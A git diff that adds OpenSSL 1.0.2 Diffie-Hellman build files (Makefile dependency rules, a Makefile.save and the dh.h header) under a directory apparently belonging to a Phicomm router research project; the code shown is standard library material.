+dh_pmeth.o: ../../include/openssl/dsa.h ../../include/openssl/e_os2.h
+dh_pmeth.o: ../../include/openssl/err.h ../../include/openssl/evp.h
+dh_pmeth.o: ../../include/openssl/lhash.h ../../include/openssl/obj_mac.h
+dh_pmeth.o: ../../include/openssl/objects.h ../../include/openssl/opensslconf.h
+dh_pmeth.o: ../../include/openssl/opensslv.h ../../include/openssl/ossl_typ.h
+dh_pmeth.o: ../../include/openssl/pkcs7.h ../../include/openssl/safestack.h
+dh_pmeth.o: ../../include/openssl/sha.h ../../include/openssl/stack.h
+dh_pmeth.o: ../../include/openssl/symhacks.h ../../include/openssl/x509.h
+dh_pmeth.o: ../../include/openssl/x509_vfy.h ../cryptlib.h ../evp/evp_locl.h
+dh_pmeth.o: dh_pmeth.c
+dh_prn.o: ../../e_os.h ../../include/openssl/asn1.h ../../include/openssl/bio.h
+dh_prn.o: ../../include/openssl/buffer.h ../../include/openssl/crypto.h
+dh_prn.o: ../../include/openssl/dh.h ../../include/openssl/e_os2.h
+dh_prn.o: ../../include/openssl/err.h ../../include/openssl/evp.h
+dh_prn.o: ../../include/openssl/lhash.h ../../include/openssl/obj_mac.h
+dh_prn.o: ../../include/openssl/objects.h ../../include/openssl/opensslconf.h
+dh_prn.o: ../../include/openssl/opensslv.h ../../include/openssl/ossl_typ.h
+dh_prn.o: ../../include/openssl/safestack.h ../../include/openssl/stack.h
+dh_prn.o: ../../include/openssl/symhacks.h ../cryptlib.h dh_prn.c
+dh_rfc5114.o: ../../e_os.h ../../include/openssl/bio.h
+dh_rfc5114.o: ../../include/openssl/bn.h ../../include/openssl/buffer.h
+dh_rfc5114.o: ../../include/openssl/crypto.h ../../include/openssl/dh.h
+dh_rfc5114.o: ../../include/openssl/e_os2.h ../../include/openssl/err.h
+dh_rfc5114.o: ../../include/openssl/lhash.h ../../include/openssl/opensslconf.h
+dh_rfc5114.o: ../../include/openssl/opensslv.h ../../include/openssl/ossl_typ.h
+dh_rfc5114.o: ../../include/openssl/safestack.h ../../include/openssl/stack.h
+dh_rfc5114.o: ../../include/openssl/symhacks.h ../cryptlib.h dh_rfc5114.c
diff --git a/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/dh/Makefile.save b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/dh/Makefile.save
new file mode 100644
index 0000000..0e65e5c
--- /dev/null
+++ b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/dh/Makefile.save
@@ -0,0 +1,191 @@
+#
+# OpenSSL/crypto/dh/Makefile
+#
+
+DIR=	dh
+TOP=	../..
+CC=	cc
+INCLUDES= -I.. -I$(TOP) -I../../include
+CFLAG=-g
+MAKEFILE=	Makefile
+AR=		ar r
+
+CFLAGS= $(INCLUDES) $(CFLAG)
+
+GENERAL=Makefile
+TEST= dhtest.c
+APPS=
+
+LIB=$(TOP)/libcrypto.a
+LIBSRC= dh_asn1.c dh_gen.c dh_key.c dh_lib.c dh_check.c dh_err.c dh_depr.c \
+	dh_ameth.c dh_pmeth.c dh_prn.c dh_rfc5114.c dh_kdf.c
+LIBOBJ= dh_asn1.o dh_gen.o dh_key.o dh_lib.o dh_check.o dh_err.o dh_depr.o \
+	dh_ameth.o dh_pmeth.o dh_prn.o dh_rfc5114.o dh_kdf.o
+
+SRC= $(LIBSRC)
+
+EXHEADER= dh.h
+HEADER=	$(EXHEADER)
+
+ALL=    $(GENERAL) $(SRC) $(HEADER)
+
+top:
+	(cd ../..; $(MAKE) DIRS=crypto SDIRS=$(DIR) sub_all)
+
+all:	lib
+
+lib:	$(LIBOBJ)
+	$(AR) $(LIB) $(LIBOBJ)
+	$(RANLIB) $(LIB) || echo Never mind.
+	@touch lib
+
+files:
+	$(PERL) $(TOP)/util/files.pl Makefile >> $(TOP)/MINFO
+
+links:
+	@$(PERL) $(TOP)/util/mklink.pl ../../include/openssl $(EXHEADER)
+	@$(PERL) $(TOP)/util/mklink.pl ../../test $(TEST)
+	@$(PERL) $(TOP)/util/mklink.pl ../../apps $(APPS)
+
+install:
+	@[ -n "$(INSTALLTOP)" ] # should be set by top Makefile...
+	@headerlist="$(EXHEADER)"; for i in $$headerlist ; \
+	do  \
+	(cp $$i $(INSTALL_PREFIX)$(INSTALLTOP)/include/openssl/$$i; \
+	chmod 644 $(INSTALL_PREFIX)$(INSTALLTOP)/include/openssl/$$i ); \
+	done;
+
+tags:
+	ctags $(SRC)
+
+tests:
+
+lint:
+	lint -DLINT $(INCLUDES) $(SRC)>fluff
+
+depend:
+	@[ -n "$(MAKEDEPEND)" ] # should be set by upper Makefile...
+	$(MAKEDEPEND) -- $(CFLAG) $(INCLUDES) $(DEPFLAG) -- $(PROGS) $(LIBSRC)
+
+dclean:
+	$(PERL) -pe 'if (/^# DO NOT DELETE THIS LINE/) {print; exit(0);}' $(MAKEFILE) >Makefile.new
+	mv -f Makefile.new $(MAKEFILE)
+
+clean:
+	rm -f *.o */*.o *.obj lib tags core .pure .nfs* *.old *.bak fluff
+
+# DO NOT DELETE THIS LINE -- make depend depends on it.
+
+dh_ameth.o: ../../e_os.h ../../include/openssl/asn1.h
+dh_ameth.o: ../../include/openssl/bio.h ../../include/openssl/bn.h
+dh_ameth.o: ../../include/openssl/buffer.h ../../include/openssl/cms.h
+dh_ameth.o: ../../include/openssl/crypto.h ../../include/openssl/dh.h
+dh_ameth.o: ../../include/openssl/e_os2.h ../../include/openssl/err.h
+dh_ameth.o: ../../include/openssl/evp.h ../../include/openssl/lhash.h
+dh_ameth.o: ../../include/openssl/obj_mac.h ../../include/openssl/objects.h
+dh_ameth.o: ../../include/openssl/opensslconf.h
+dh_ameth.o: ../../include/openssl/opensslv.h ../../include/openssl/ossl_typ.h
+dh_ameth.o: ../../include/openssl/pkcs7.h ../../include/openssl/safestack.h
+dh_ameth.o: ../../include/openssl/sha.h ../../include/openssl/stack.h
+dh_ameth.o: ../../include/openssl/symhacks.h ../../include/openssl/x509.h
+dh_ameth.o: ../../include/openssl/x509_vfy.h ../asn1/asn1_locl.h ../cryptlib.h
+dh_ameth.o: dh_ameth.c
+dh_asn1.o: ../../e_os.h ../../include/openssl/asn1.h
+dh_asn1.o: ../../include/openssl/asn1t.h ../../include/openssl/bio.h
+dh_asn1.o: ../../include/openssl/bn.h ../../include/openssl/buffer.h
+dh_asn1.o: ../../include/openssl/crypto.h ../../include/openssl/dh.h
+dh_asn1.o: ../../include/openssl/e_os2.h ../../include/openssl/err.h
+dh_asn1.o: ../../include/openssl/lhash.h ../../include/openssl/obj_mac.h
+dh_asn1.o: ../../include/openssl/objects.h ../../include/openssl/opensslconf.h
+dh_asn1.o: ../../include/openssl/opensslv.h ../../include/openssl/ossl_typ.h
+dh_asn1.o: ../../include/openssl/safestack.h ../../include/openssl/stack.h
+dh_asn1.o: ../../include/openssl/symhacks.h ../cryptlib.h dh_asn1.c
+dh_check.o: ../../e_os.h ../../include/openssl/bio.h ../../include/openssl/bn.h
+dh_check.o: ../../include/openssl/buffer.h ../../include/openssl/crypto.h
+dh_check.o: ../../include/openssl/dh.h ../../include/openssl/e_os2.h
+dh_check.o: ../../include/openssl/err.h ../../include/openssl/lhash.h
+dh_check.o: ../../include/openssl/opensslconf.h
+dh_check.o: ../../include/openssl/opensslv.h ../../include/openssl/ossl_typ.h
+dh_check.o: ../../include/openssl/safestack.h ../../include/openssl/stack.h
+dh_check.o: ../../include/openssl/symhacks.h ../cryptlib.h dh_check.c
+dh_depr.o: ../../e_os.h ../../include/openssl/bio.h ../../include/openssl/bn.h
+dh_depr.o: ../../include/openssl/buffer.h ../../include/openssl/crypto.h
+dh_depr.o: ../../include/openssl/dh.h ../../include/openssl/e_os2.h
+dh_depr.o: ../../include/openssl/err.h ../../include/openssl/lhash.h
+dh_depr.o: ../../include/openssl/opensslconf.h ../../include/openssl/opensslv.h
+dh_depr.o: ../../include/openssl/ossl_typ.h ../../include/openssl/safestack.h
+dh_depr.o: ../../include/openssl/stack.h ../../include/openssl/symhacks.h
+dh_depr.o: ../cryptlib.h dh_depr.c
+dh_err.o: ../../include/openssl/bio.h ../../include/openssl/crypto.h
+dh_err.o: ../../include/openssl/dh.h ../../include/openssl/e_os2.h
+dh_err.o: ../../include/openssl/err.h ../../include/openssl/lhash.h
+dh_err.o: ../../include/openssl/opensslconf.h ../../include/openssl/opensslv.h
+dh_err.o: ../../include/openssl/ossl_typ.h ../../include/openssl/safestack.h
+dh_err.o: ../../include/openssl/stack.h ../../include/openssl/symhacks.h
+dh_err.o: dh_err.c
+dh_gen.o: ../../e_os.h ../../include/openssl/bio.h ../../include/openssl/bn.h
+dh_gen.o: ../../include/openssl/buffer.h ../../include/openssl/crypto.h
+dh_gen.o: ../../include/openssl/dh.h ../../include/openssl/e_os2.h
+dh_gen.o: ../../include/openssl/err.h ../../include/openssl/lhash.h
+dh_gen.o: ../../include/openssl/opensslconf.h ../../include/openssl/opensslv.h
+dh_gen.o: ../../include/openssl/ossl_typ.h ../../include/openssl/safestack.h
+dh_gen.o: ../../include/openssl/stack.h ../../include/openssl/symhacks.h
+dh_gen.o: ../cryptlib.h dh_gen.c
+dh_kdf.o: ../../include/openssl/asn1.h ../../include/openssl/bio.h
+dh_kdf.o: ../../include/openssl/buffer.h ../../include/openssl/cms.h
+dh_kdf.o: ../../include/openssl/crypto.h ../../include/openssl/dh.h
+dh_kdf.o: ../../include/openssl/e_os2.h ../../include/openssl/evp.h
+dh_kdf.o: ../../include/openssl/lhash.h ../../include/openssl/obj_mac.h
+dh_kdf.o: ../../include/openssl/objects.h ../../include/openssl/opensslconf.h
+dh_kdf.o: ../../include/openssl/opensslv.h ../../include/openssl/ossl_typ.h
+dh_kdf.o: ../../include/openssl/pkcs7.h ../../include/openssl/safestack.h
+dh_kdf.o: ../../include/openssl/sha.h ../../include/openssl/stack.h
+dh_kdf.o: ../../include/openssl/symhacks.h ../../include/openssl/x509.h
+dh_kdf.o: ../../include/openssl/x509_vfy.h dh_kdf.c
+dh_key.o: ../../e_os.h ../../include/openssl/bio.h ../../include/openssl/bn.h
+dh_key.o: ../../include/openssl/buffer.h ../../include/openssl/crypto.h
+dh_key.o: ../../include/openssl/dh.h ../../include/openssl/e_os2.h
+dh_key.o: ../../include/openssl/err.h ../../include/openssl/lhash.h
+dh_key.o: ../../include/openssl/opensslconf.h ../../include/openssl/opensslv.h
+dh_key.o: ../../include/openssl/ossl_typ.h ../../include/openssl/rand.h
+dh_key.o: ../../include/openssl/safestack.h ../../include/openssl/stack.h
+dh_key.o: ../../include/openssl/symhacks.h ../cryptlib.h dh_key.c
+dh_lib.o: ../../e_os.h ../../include/openssl/bio.h ../../include/openssl/bn.h
+dh_lib.o: ../../include/openssl/buffer.h ../../include/openssl/crypto.h
+dh_lib.o: ../../include/openssl/dh.h ../../include/openssl/e_os2.h
+dh_lib.o: ../../include/openssl/err.h ../../include/openssl/lhash.h
+dh_lib.o: ../../include/openssl/opensslconf.h ../../include/openssl/opensslv.h
+dh_lib.o: ../../include/openssl/ossl_typ.h ../../include/openssl/safestack.h
+dh_lib.o: ../../include/openssl/stack.h ../../include/openssl/symhacks.h
+dh_lib.o: ../cryptlib.h dh_lib.c
+dh_pmeth.o: ../../e_os.h ../../include/openssl/asn1.h
+dh_pmeth.o: ../../include/openssl/asn1t.h ../../include/openssl/bio.h
+dh_pmeth.o: ../../include/openssl/bn.h ../../include/openssl/buffer.h
+dh_pmeth.o: ../../include/openssl/crypto.h ../../include/openssl/dh.h
+dh_pmeth.o: ../../include/openssl/dsa.h ../../include/openssl/e_os2.h
+dh_pmeth.o: ../../include/openssl/err.h ../../include/openssl/evp.h
+dh_pmeth.o: ../../include/openssl/lhash.h ../../include/openssl/obj_mac.h
+dh_pmeth.o: ../../include/openssl/objects.h ../../include/openssl/opensslconf.h
+dh_pmeth.o: ../../include/openssl/opensslv.h ../../include/openssl/ossl_typ.h
+dh_pmeth.o: ../../include/openssl/pkcs7.h ../../include/openssl/safestack.h
+dh_pmeth.o: ../../include/openssl/sha.h ../../include/openssl/stack.h
+dh_pmeth.o: ../../include/openssl/symhacks.h ../../include/openssl/x509.h
+dh_pmeth.o: ../../include/openssl/x509_vfy.h ../cryptlib.h ../evp/evp_locl.h
+dh_pmeth.o: dh_pmeth.c
+dh_prn.o: ../../e_os.h ../../include/openssl/asn1.h ../../include/openssl/bio.h
+dh_prn.o: ../../include/openssl/buffer.h ../../include/openssl/crypto.h
+dh_prn.o: ../../include/openssl/dh.h ../../include/openssl/e_os2.h
+dh_prn.o: ../../include/openssl/err.h ../../include/openssl/evp.h
+dh_prn.o: ../../include/openssl/lhash.h ../../include/openssl/obj_mac.h
+dh_prn.o: ../../include/openssl/objects.h ../../include/openssl/opensslconf.h
+dh_prn.o: ../../include/openssl/opensslv.h ../../include/openssl/ossl_typ.h
+dh_prn.o: ../../include/openssl/safestack.h ../../include/openssl/stack.h
+dh_prn.o: ../../include/openssl/symhacks.h ../cryptlib.h dh_prn.c
+dh_rfc5114.o: ../../e_os.h ../../include/openssl/bio.h
+dh_rfc5114.o: ../../include/openssl/bn.h ../../include/openssl/buffer.h
+dh_rfc5114.o: ../../include/openssl/crypto.h ../../include/openssl/dh.h
+dh_rfc5114.o: ../../include/openssl/e_os2.h ../../include/openssl/err.h
+dh_rfc5114.o: ../../include/openssl/lhash.h ../../include/openssl/opensslconf.h
+dh_rfc5114.o: ../../include/openssl/opensslv.h ../../include/openssl/ossl_typ.h
+dh_rfc5114.o: ../../include/openssl/safestack.h ../../include/openssl/stack.h
+dh_rfc5114.o: ../../include/openssl/symhacks.h ../cryptlib.h dh_rfc5114.c
diff --git a/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/dh/dh.h b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/dh/dh.h
new file mode 100644
index 0000000..0502f1a
--- /dev/null
+++ b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/dh/dh.h
@@ -0,0 +1,392 @@
+/* crypto/dh/dh.h */
+/* Copyright (C) 1995-1998 Eric Young (eay@cryptsoft.com)
+ * All rights reserved.
+ *
+ * This package is an SSL implementation written
+ * by Eric Young (eay@cryptsoft.com).
+ * The implementation was written so as to conform with Netscapes SSL.
+ *
+ * This library is free for commercial and non-commercial use as long as
+ * the following conditions are aheared to.  The following conditions
+ * apply to all code found in this distribution, be it the RC4, RSA,
+ * lhash, DES, etc., code; not just the SSL code.  The SSL documentation
+ * included with this distribution is covered by the same copyright terms
+ * except that the holder is Tim Hudson (tjh@cryptsoft.com).
+ *
+ * Copyright remains Eric Young's, and as such any Copyright notices in
+ * the code are not to be removed.
+ * If this package is used in a product, Eric Young should be given attribution
+ * as the author of the parts of the library used.
+ * This can be in the form of a textual message at program startup or
+ * in documentation (online or textual) provided with the package.
+ *
+ * Redistribution and use in source and binary forms, with or without
+ * modification, are permitted provided that the following conditions
+ * are met:
+ * 1. Redistributions of source code must retain the copyright
+ *    notice, this list of conditions and the following disclaimer.
+ * 2. Redistributions in binary form must reproduce the above copyright
+ *    notice, this list of conditions and the following disclaimer in the
+ *    documentation and/or other materials provided with the distribution.
+ * 3. All advertising materials mentioning features or use of this software
+ *    must display the following acknowledgement:
+ *    "This product includes cryptographic software written by
+ *     Eric Young (eay@cryptsoft.com)"
+ *    The word 'cryptographic' can be left out if the rouines from the library
+ *    being used are not cryptographic related :-).
+ * 4. If you include any Windows specific code (or a derivative thereof) from
+ *    the apps directory (application code) you must include an acknowledgement:
+ *    "This product includes software written by Tim Hudson (tjh@cryptsoft.com)"
+ *
+ * THIS SOFTWARE IS PROVIDED BY ERIC YOUNG ``AS IS'' AND
+ * ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE
+ * IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE
+ * ARE DISCLAIMED.  IN NO EVENT SHALL THE AUTHOR OR CONTRIBUTORS BE LIABLE
+ * FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL
+ * DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS
+ * OR SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION)
+ * HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT
+ * LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY
+ * OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF
+ * SUCH DAMAGE.
+ *
+ * The licence and distribution terms for any publically available version or
+ * derivative of this code cannot be changed.  i.e. this code cannot simply be
+ * copied and put under another distribution licence
+ * [including the GNU Public Licence.]
+ */
+
+#ifndef HEADER_DH_H
+# define HEADER_DH_H
+
+# include <openssl/e_os2.h>
+
+# ifdef OPENSSL_NO_DH
+#  error DH is disabled.
+# endif
+
+# ifndef OPENSSL_NO_BIO
+#  include <openssl/bio.h>
+# endif
+# include <openssl/ossl_typ.h>
+# ifndef OPENSSL_NO_DEPRECATED
+#  include <openssl/bn.h>
+# endif
+
+# ifndef OPENSSL_DH_MAX_MODULUS_BITS
+#  define OPENSSL_DH_MAX_MODULUS_BITS    10000
+# endif
+
+# define DH_FLAG_CACHE_MONT_P     0x01
+
+/*
+ * new with 0.9.7h; the built-in DH
+ * implementation now uses constant time
+ * modular exponentiation for secret exponents
+ * by default. This flag causes the
+ * faster variable sliding window method to
+ * be used for all exponents.
+ */
+# define DH_FLAG_NO_EXP_CONSTTIME 0x02
+
+/*
+ * If this flag is set the DH method is FIPS compliant and can be used in
+ * FIPS mode. This is set in the validated module method. If an application
+ * sets this flag in its own methods it is its reposibility to ensure the
+ * result is compliant.
+ */
+
+# define DH_FLAG_FIPS_METHOD                     0x0400
+
+/*
+ * If this flag is set the operations normally disabled in FIPS mode are
+ * permitted it is then the applications responsibility to ensure that the
+ * usage is compliant.
+ */
+
+# define DH_FLAG_NON_FIPS_ALLOW                  0x0400
+
+#ifdef  __cplusplus
+extern "C" {
+#endif
+
+/* Already defined in ossl_typ.h */
+/* typedef struct dh_st DH; */
+/* typedef struct dh_method DH_METHOD; */
+
+struct dh_method {
+    const char *name;
+    /* Methods here */
+    int (*generate_key) (DH *dh);
+    int (*compute_key) (unsigned char *key, const BIGNUM *pub_key, DH *dh);
+    /* Can be null */
+    int (*bn_mod_exp) (const DH *dh, BIGNUM *r, const BIGNUM *a,
+                       const BIGNUM *p, const BIGNUM *m, BN_CTX *ctx,
+                       BN_MONT_CTX *m_ctx);
+    int (*init) (DH *dh);
+    int (*finish) (DH *dh);
+    int flags;
+    char *app_data;
+    /* If this is non-NULL, it will be used to generate parameters */
+    int (*generate_params) (DH *dh, int prime_len, int generator,
+                            BN_GENCB *cb);
+};
+
+struct dh_st {
+    /*
+     * This first argument is used to pick up errors when a DH is passed
+     * instead of a EVP_PKEY
+     */
+    int pad;
+    int version;
+    BIGNUM *p;
+    BIGNUM *g;
+    long length;                /* optional */
+    BIGNUM *pub_key;            /* g^x */
+    BIGNUM *priv_key;           /* x */
+    int flags;
+    BN_MONT_CTX *method_mont_p;
+    /* Place holders if we want to do X9.42 DH */
+    BIGNUM *q;
+    BIGNUM *j;
+    unsigned char *seed;
+    int seedlen;
+    BIGNUM *counter;
+    int references;
+    CRYPTO_EX_DATA ex_data;
+    const DH_METHOD *meth;
+    ENGINE *engine;
+};
+
+# define DH_GENERATOR_2          2
+/* #define DH_GENERATOR_3       3 */
+# define DH_GENERATOR_5          5
+
+/* DH_check error codes */
+# define DH_CHECK_P_NOT_PRIME            0x01
+# define DH_CHECK_P_NOT_SAFE_PRIME       0x02
+# define DH_UNABLE_TO_CHECK_GENERATOR    0x04
+# define DH_NOT_SUITABLE_GENERATOR       0x08
+# define DH_CHECK_Q_NOT_PRIME            0x10
+# define DH_CHECK_INVALID_Q_VALUE        0x20
+# define DH_CHECK_INVALID_J_VALUE        0x40
+
+/* DH_check_pub_key error codes */
+# define DH_CHECK_PUBKEY_TOO_SMALL       0x01
+# define DH_CHECK_PUBKEY_TOO_LARGE       0x02
+
+/*
+ * primes p where (p-1)/2 is prime too are called "safe"; we define this for
+ * backward compatibility:
+ */
+# define DH_CHECK_P_NOT_STRONG_PRIME     DH_CHECK_P_NOT_SAFE_PRIME
+
+# define d2i_DHparams_fp(fp,x) (DH *)ASN1_d2i_fp((char *(*)())DH_new, \
+                (char *(*)())d2i_DHparams,(fp),(unsigned char **)(x))
+# define i2d_DHparams_fp(fp,x) ASN1_i2d_fp(i2d_DHparams,(fp), \
+                (unsigned char *)(x))
+# define d2i_DHparams_bio(bp,x) ASN1_d2i_bio_of(DH,DH_new,d2i_DHparams,bp,x)
+# define i2d_DHparams_bio(bp,x) ASN1_i2d_bio_of_const(DH,i2d_DHparams,bp,x)
+
+DH *DHparams_dup(DH *);
+
+const DH_METHOD *DH_OpenSSL(void);
+
+void DH_set_default_method(const DH_METHOD *meth);
+const DH_METHOD *DH_get_default_method(void);
+int DH_set_method(DH *dh, const DH_METHOD *meth);
+DH *DH_new_method(ENGINE *engine);
+
+DH *DH_new(void);
+void DH_free(DH *dh);
+int DH_up_ref(DH *dh);
+int DH_size(const DH *dh);
+int DH_get_ex_new_index(long argl, void *argp, CRYPTO_EX_new *new_func,
+                        CRYPTO_EX_dup *dup_func, CRYPTO_EX_free *free_func);
+int DH_set_ex_data(DH *d, int idx, void *arg);
+void *DH_get_ex_data(DH *d, int idx);
+
+/* Deprecated version */
+# ifndef OPENSSL_NO_DEPRECATED
+DH *DH_generate_parameters(int prime_len, int generator,
+                           void (*callback) (int, int, void *), void *cb_arg);
+# endif                         /* !defined(OPENSSL_NO_DEPRECATED) */
+
+/* New version */
+int DH_generate_parameters_ex(DH *dh, int prime_len, int generator,
+                              BN_GENCB *cb);
+
+int DH_check(const DH *dh, int *codes);
+int DH_check_pub_key(const DH *dh, const BIGNUM *pub_key, int *codes);
+int DH_generate_key(DH *dh);
+int DH_compute_key(unsigned char *key, const BIGNUM *pub_key, DH *dh);
+int DH_compute_key_padded(unsigned char *key, const BIGNUM *pub_key, DH *dh);
+DH *d2i_DHparams(DH **a, const unsigned char **pp, long length);
+int i2d_DHparams(const DH *a, unsigned char **pp);
+DH *d2i_DHxparams(DH **a, const unsigned char **pp, long length);
+int i2d_DHxparams(const DH *a, unsigned char **pp);
+# ifndef OPENSSL_NO_FP_API
+int DHparams_print_fp(FILE *fp, const DH *x);
+# endif
+# ifndef OPENSSL_NO_BIO
+int DHparams_print(BIO *bp, const DH *x);
+# else
+int DHparams_print(char *bp, const DH *x);
+# endif
+
+/* RFC 5114 parameters */
+DH *DH_get_1024_160(void);
+DH *DH_get_2048_224(void);
+DH *DH_get_2048_256(void);
+
+/* RFC2631 KDF */
+int DH_KDF_X9_42(unsigned char *out, size_t outlen,
+                 const unsigned char *Z, size_t Zlen,
+                 ASN1_OBJECT *key_oid,
+                 const unsigned char *ukm, size_t ukmlen, const EVP_MD *md);
+
+# define EVP_PKEY_CTX_set_dh_paramgen_prime_len(ctx, len) \
+        EVP_PKEY_CTX_ctrl(ctx, EVP_PKEY_DH, EVP_PKEY_OP_PARAMGEN, \
+                        EVP_PKEY_CTRL_DH_PARAMGEN_PRIME_LEN, len, NULL)
+
+# define EVP_PKEY_CTX_set_dh_paramgen_subprime_len(ctx, len) \
+        EVP_PKEY_CTX_ctrl(ctx, EVP_PKEY_DH, EVP_PKEY_OP_PARAMGEN, \
+                        EVP_PKEY_CTRL_DH_PARAMGEN_SUBPRIME_LEN, len, NULL)
+
+# define EVP_PKEY_CTX_set_dh_paramgen_type(ctx, typ) \
+        EVP_PKEY_CTX_ctrl(ctx, EVP_PKEY_DH, EVP_PKEY_OP_PARAMGEN, \
+                        EVP_PKEY_CTRL_DH_PARAMGEN_TYPE, typ, NULL)
+
+# define EVP_PKEY_CTX_set_dh_paramgen_generator(ctx, gen) \
+        EVP_PKEY_CTX_ctrl(ctx, EVP_PKEY_DH, EVP_PKEY_OP_PARAMGEN, \
+                        EVP_PKEY_CTRL_DH_PARAMGEN_GENERATOR, gen, NULL)
+
+# define EVP_PKEY_CTX_set_dh_rfc5114(ctx, gen) \
+        EVP_PKEY_CTX_ctrl(ctx, EVP_PKEY_DHX, EVP_PKEY_OP_PARAMGEN, \
+                        EVP_PKEY_CTRL_DH_RFC5114, gen, NULL)
+
+# define EVP_PKEY_CTX_set_dhx_rfc5114(ctx, gen) \
+        EVP_PKEY_CTX_ctrl(ctx, EVP_PKEY_DHX, EVP_PKEY_OP_PARAMGEN, \
+                        EVP_PKEY_CTRL_DH_RFC5114, gen, NULL)
+
+# define EVP_PKEY_CTX_set_dh_kdf_type(ctx, kdf) \
+        EVP_PKEY_CTX_ctrl(ctx, EVP_PKEY_DHX, \
+                                EVP_PKEY_OP_DERIVE, \
+                                EVP_PKEY_CTRL_DH_KDF_TYPE, kdf, NULL)
+
+# define EVP_PKEY_CTX_get_dh_kdf_type(ctx) \
+        EVP_PKEY_CTX_ctrl(ctx, EVP_PKEY_DHX, \
+                                EVP_PKEY_OP_DERIVE, \
+                                EVP_PKEY_CTRL_DH_KDF_TYPE, -2, NULL)
+
+# define EVP_PKEY_CTX_set0_dh_kdf_oid(ctx, oid) \
+        EVP_PKEY_CTX_ctrl(ctx, EVP_PKEY_DHX, \
+                                EVP_PKEY_OP_DERIVE, \
+                                EVP_PKEY_CTRL_DH_KDF_OID, 0, (void *)oid)
+
+# define EVP_PKEY_CTX_get0_dh_kdf_oid(ctx, poid) \
+        EVP_PKEY_CTX_ctrl(ctx, EVP_PKEY_DHX, \
+                                EVP_PKEY_OP_DERIVE, \
+                                EVP_PKEY_CTRL_GET_DH_KDF_OID, 0, (void *)poid)
+
+# define EVP_PKEY_CTX_set_dh_kdf_md(ctx, md) \
+        EVP_PKEY_CTX_ctrl(ctx, EVP_PKEY_DHX, \
+                                EVP_PKEY_OP_DERIVE, \
+                                EVP_PKEY_CTRL_DH_KDF_MD, 0, (void *)md)
+
+# define EVP_PKEY_CTX_get_dh_kdf_md(ctx, pmd) \
+        EVP_PKEY_CTX_ctrl(ctx, EVP_PKEY_DHX, \
+                                EVP_PKEY_OP_DERIVE, \
+                                EVP_PKEY_CTRL_GET_DH_KDF_MD, 0, (void *)pmd)
+
+# define EVP_PKEY_CTX_set_dh_kdf_outlen(ctx, len) \
+        EVP_PKEY_CTX_ctrl(ctx, EVP_PKEY_DHX, \
+                                EVP_PKEY_OP_DERIVE, \
+                                EVP_PKEY_CTRL_DH_KDF_OUTLEN, len, NULL)
+
+# define EVP_PKEY_CTX_get_dh_kdf_outlen(ctx, plen) \
+        EVP_PKEY_CTX_ctrl(ctx, EVP_PKEY_DHX, \
+                                EVP_PKEY_OP_DERIVE, \
+                        EVP_PKEY_CTRL_GET_DH_KDF_OUTLEN, 0, (void *)plen)
+
+# define EVP_PKEY_CTX_set0_dh_kdf_ukm(ctx, p, plen) \
+        EVP_PKEY_CTX_ctrl(ctx, EVP_PKEY_DHX, \
+                                EVP_PKEY_OP_DERIVE, \
+                                EVP_PKEY_CTRL_DH_KDF_UKM, plen, (void *)p)
+
+# define EVP_PKEY_CTX_get0_dh_kdf_ukm(ctx, p) \
+        EVP_PKEY_CTX_ctrl(ctx, EVP_PKEY_DHX, \
+                                EVP_PKEY_OP_DERIVE, \
+                                EVP_PKEY_CTRL_GET_DH_KDF_UKM, 0, (void *)p)
+
+# define EVP_PKEY_CTRL_DH_PARAMGEN_PRIME_LEN     (EVP_PKEY_ALG_CTRL + 1)
+# define EVP_PKEY_CTRL_DH_PARAMGEN_GENERATOR     (EVP_PKEY_ALG_CTRL + 2)
+# define EVP_PKEY_CTRL_DH_RFC5114                (EVP_PKEY_ALG_CTRL + 3)
+# define EVP_PKEY_CTRL_DH_PARAMGEN_SUBPRIME_LEN  (EVP_PKEY_ALG_CTRL + 4)
+# define EVP_PKEY_CTRL_DH_PARAMGEN_TYPE          (EVP_PKEY_ALG_CTRL + 5)
+# define EVP_PKEY_CTRL_DH_KDF_TYPE               (EVP_PKEY_ALG_CTRL + 6)
+# define EVP_PKEY_CTRL_DH_KDF_MD                 (EVP_PKEY_ALG_CTRL + 7)
+# define EVP_PKEY_CTRL_GET_DH_KDF_MD             (EVP_PKEY_ALG_CTRL + 8)
+# define EVP_PKEY_CTRL_DH_KDF_OUTLEN             (EVP_PKEY_ALG_CTRL + 9)
+# define EVP_PKEY_CTRL_GET_DH_KDF_OUTLEN         (EVP_PKEY_ALG_CTRL + 10)
+# define EVP_PKEY_CTRL_DH_KDF_UKM                (EVP_PKEY_ALG_CTRL + 11)
+# define EVP_PKEY_CTRL_GET_DH_KDF_UKM            (EVP_PKEY_ALG_CTRL + 12)
+# define EVP_PKEY_CTRL_DH_KDF_OID                (EVP_PKEY_ALG_CTRL + 13)
+# define EVP_PKEY_CTRL_GET_DH_KDF_OID            (EVP_PKEY_ALG_CTRL + 14)
+
+/* KDF types */
+# define EVP_PKEY_DH_KDF_NONE                            1
+# define EVP_PKEY_DH_KDF_X9_42                           2
+
+/* BEGIN ERROR CODES */
+/*
+ * The following lines are auto generated by the script mkerr.pl. Any changes
+ * made after this point may be overwritten when the script is next run.
+ */
+void ERR_load_DH_strings(void);
+
+/* Error codes for the DH functions. */
+
+/* Function codes. */
+# define DH_F_COMPUTE_KEY                                 102
+# define DH_F_DHPARAMS_PRINT_FP                           101
+# define DH_F_DH_BUILTIN_GENPARAMS                        106
+# define DH_F_DH_CMS_DECRYPT                              117
